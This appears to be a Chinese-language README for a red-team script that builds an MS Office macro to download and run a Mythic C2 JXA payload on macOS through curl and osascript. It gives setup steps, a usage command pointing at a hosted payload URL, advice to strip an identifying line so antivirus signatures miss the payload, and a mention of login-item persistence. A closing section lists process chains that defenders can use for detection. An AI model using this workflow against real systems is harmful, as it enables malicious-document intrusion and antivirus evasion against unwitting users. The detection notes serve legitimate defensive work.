用于生成 MS Office 宏的 Python3 脚本,用于启动 Mythic JXA 有效载荷。
此脚本生成一个 Office 宏,该宏使用 osascript 下载并执行 Mythic JXA .js 有效载荷。
步骤:
设置 Mythic C2 服务器并生成一个 "apfell" jxa 有效载荷(注意:此生成器假设有效载荷使用 http 而非 https...如果您使用 https,可以修改生成器脚本让 curl 使用 https)。在 Mythic 服务器上下载该有效载荷。
删除 Mythic JXA .js 启动器的第一行("// Created by Cody Thomas - @its_a_feature_")。已知某些静态 A/V 签名会检查此静态字符串。托管该有效载荷(例如:将 .js 有效载荷放入文件夹并使用 python -m SimpleHTTPServer 进行托管)
运行此宏生成器:
python3 jxa-macro.py -u [url to the hosted .js payload in #2 above]
example: python3 jxa-macro.py -u http://192.168.1.1:8000/apfell2.js
宏文本将输出到同一目录下名为 "macro.txt" 的文件中。
将该宏复制并粘贴到 MS Office 文档中。
检测:
此宏会产生以下可用于检测的父子进程关系:
Office 产品(例如:Microsoft Word.app) --> /bin/sh
Office 产品(例如:Microsoft Word.app) --> /bin/bash
Office 产品(例如:Microsoft Word.app) --> /usr/bin/curl
注意:这将在应用沙盒内启动 JXA 有效载荷。不过,Mythic 确实有能力甚至从应用沙盒中添加登录项持久化。